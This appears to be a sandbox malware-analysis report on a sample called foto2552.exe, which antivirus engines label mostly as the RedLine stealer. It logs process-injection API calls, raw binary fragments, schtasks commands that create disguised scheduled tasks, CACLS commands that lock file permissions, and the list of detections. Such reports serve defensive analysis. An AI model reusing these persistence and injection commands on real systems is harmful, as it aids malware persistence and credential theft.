NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2344 region_size: 204800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c	1	0
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPEL`x,eà$¸A@@ @L(ààðÐ/à @@.text) `.rdataxa@b.@@.datah#°@À.rsrcàà@@.relocÐ/ð0 @B base_address: 0x00400000 process_identifier: 2344 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: base_address: 0x00401000 process_identifier: 2344 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: base_address: 0x00424000 process_identifier: 2344 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ ÿÿÿÿ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þZB@¶B@¶B@¶B@¶B@¶BH¶B]B^BÈTBµB`°BC¶BHÇBHÇBHÇBHÇBHÇBHÇBHÇBHÇBHÇB¶BLÇBLÇBLÇBLÇBLÇBLÇBLÇB..þÿÿÿ þÿÿÿuÐù¾cyåú¦eÍiLÅ?þDVÐü!Êû×6}¼$ÁªaÐº;ëZèy©Ä@éã¶úæô;;¥¹Ò3[ 1à©ÜÞÙ#,ss3WILÈ½y+ qPøkú¢¼ÇmµúÂÆâs5}àO£tdïôfGj}É¬:ø÷¹â&÷c&ÀÇ@zÞcÅgÓÑëGïNn3g\|ÔZØ²¤G> b&}LºFwXÍ\|[x¦D@q#4m$>äÂö>/ö8Iå¸7ÐGñD¨íòDñ¥Ñ&\qÀÒJ²Z $\ÒVi×´v8·´Æ&Àÿ>Ì<[ÏlEfMdý\|îoK¡JnÜnÔÏ¯ ïµÃFòÜxAayÛOw(ì³Ö-ÆÆõA5«V¥0½REAãýñbG-¨¦¥ [Êþdã0[okûhn¤ÛB±±!S^¥4\Áéj8ªJÛ®!2É)C¨ñgÕ{@ÜMZ¶ß?þ÷}M¯,ëïõ Û³OS÷=B9Àc\#Ã\9§ 0b;(Ïÿ©(ÎZï¨ðóe^4>ØxúI"WÂB°%/í¯¼áy?Ó( ÖüMÝð·7¢L{éü=·Ë¡gÇmPvl\|Sâ DÄêq¯où¾Ì !sì©M7<wòÂ,-<L1Ò ¿ü/wÌð¹DPÐò°=þoÊÐðÒ¶eÆzoaªd>aùr)0Þ sÉzdÎD8@¸Þ¿åK@X¥³jj&å"ª¯L¤E©ÊæpÏ_éKr¢OÝTmªÛªuZE)J2^D{ðR¤%£§õ¼wX"Æ®ë"~"ê<äPu¶ç5G}¹~ó³Pr<LÌu ítuuDæÔúäfÂî4Ñ@#j-ÂÒ£ÑÉºgÍZê·í2>[Ììgu½CPHçëhºö-áN($q$ãeË°þm*âk3²Jd¼I?Ó#J0ÊDêQâZb&'Ô ¦g¡Æ^_/\|B.?AVbad_exception@std@@\|B.?AVexception@std@@\|B.?AVtype_info@@ base_address: 0x0042b000 process_identifier: 2344 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: 0 H`à}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0042e000 process_identifier: 2344 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: base_address: 0x0042f000 process_identifier: 2344 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2344 process_handle: 0x0000002c	1	1
NtSetContextThread Oct. 16, 2023, 9:44 a.m.	registers.eip: 2005598660 registers.esp: 3800852 registers.edi: 0 registers.eax: 4198977 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000020 process_identifier: 2344	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x00000020 suspend_count: 1 process_identifier: 2344	1	0
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2984 thread_handle: 0x000002e0 process_identifier: 2980 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000308	1	1
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 3020 thread_handle: 0x00000310 process_identifier: 3016 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe" /tn "\WindowsAppPool\7XUI4o616d4Syjf" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000030c	1	1
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x00000188 suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x000001fc suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x00000238 suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x00000278 suspend_count: 1 process_identifier: 2404	1	0
NtGetContextThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x0000018c	1	0
NtGetContextThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x0000018c	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x00000344 suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x000003a8 suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x00000428 suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x000004a8 suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x000004c8 suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x000004e0 suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x00000510 suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x0000041c suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x000004d8 suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x000003a8 suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x000002b8 suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x00000468 suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x000004cc suspend_count: 1 process_identifier: 2404	1	0
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x000002dc suspend_count: 1 process_identifier: 2404	1	0
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2176 thread_handle: 0x000002b0 process_identifier: 2112 current_directory: C:\Users\test22\AppData\Local\Temp\IXP004.TMP filepath: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002b8	1	1
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2132 thread_handle: 0x00000138 process_identifier: 2104 current_directory: C:\Users\test22\AppData\Local\Temp\IXP004.TMP filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe" /tn "\WindowsAppPool\7XUI4o616d4Syjf" filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000013c	1	1
NtResumeThread Oct. 16, 2023, 9:44 a.m.	thread_handle: 0x0000027c suspend_count: 1 process_identifier: 2112	1	0
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2288 thread_handle: 0x000002a0 process_identifier: 2292 current_directory: C:\Users\test22\AppData\Local\Temp\IXP004.TMP filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a8	1	1
CreateProcessInternalW Oct. 16, 2023, 9:44 a.m.	thread_identifier: 2400 thread_handle: 0x00000228 process_identifier: 2384 current_directory: C:\Users\test22\AppData\Local\Temp\fefffe8cea filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y\|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000294	1	1

File has been identified by 45 AntiVirus engines on VirusTotal as malicious (45 events)

Bkav	W32.AIDetectMalware
MicroWorld-eScan	IL:Trojan.MSILMamut.12798
CAT-QuickHeal	Trojan.GenericPMF.S17672681
Skyhigh	BehavesLike.Win32.Generic.tc
McAfee	Trojan-FVTT!C7523BCA22D8
VIPRE	IL:Trojan.MSILMamut.12798
Sangfor	Trojan.Win32.Save.a
Cybereason	malicious.58c1f6
VirIT	Trojan.Win32.Genus.IHW
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	multiple detections
Cynet	Malicious (score: 99)
APEX	Malicious
ClamAV	Win.Malware.Trojanx-9862538-0
Kaspersky	HEUR:Trojan-PSW.Win32.Stealerc.gen
NANO-Antivirus	Trojan.Win32.Deyma.kbnced
SUPERAntiSpyware	Trojan.Agent/Gen-Downloader
Avast	Win32:PWSX-gen [Trj]
F-Secure	Trojan.TR/Spy.RedLine.kiivp
DrWeb	Trojan.Siggen21.42383
TrendMicro	TrojanSpy.Win32.TRICKBOT.SMC
Trapmine	malicious.high.ml.score
Sophos	Generic ML PUA (PUA)
Ikarus	Trojan.Spy.Stealer
Jiangmin	TrojanDownloader.Deyma.arg
Varist	W32/Kryptik.JKR.gen!Eldorado
Avira	TR/Spy.RedLine.kiivp
Antiy-AVL	Trojan/Win32.Tiggre
Gridinsoft	Spy.Win32.Redline.lu!heur
Microsoft	Trojan:Script/Phonzy.B!ml
ZoneAlarm	HEUR:Trojan-PSW.Win32.Stealerc.gen
GData	Win32.Trojan.PSE.1N3O6MD
Google	Detected
Acronis	suspicious
ALYac	Trojan.GenericKD.69761066
Malwarebytes	Generic.Malware.AI.DDS
Zoner	Trojan.Win32.162634
TrendMicro-HouseCall	TrojanSpy.Win32.TRICKBOT.SMC
Rising	Trojan.Generic@AI.100 (RDML:fSgma3pc2tEC01csnNmaZA)
Yandex	TrojanSpy.RedLine!0kIL3oMBK6E
SentinelOne	Static AI - Malicious SFX
Fortinet	W32/Kryptik.HUTD!tr
AVG	Win32:PWSX-gen [Trj]
DeepInstinct	MALICIOUS

The process powershell.exe wrote an executable file to disk which it then attempted to execute (2 events)

file	C:\Program Files (x86)\Internet Explorer\iexplore.exe
file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

foto2552.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All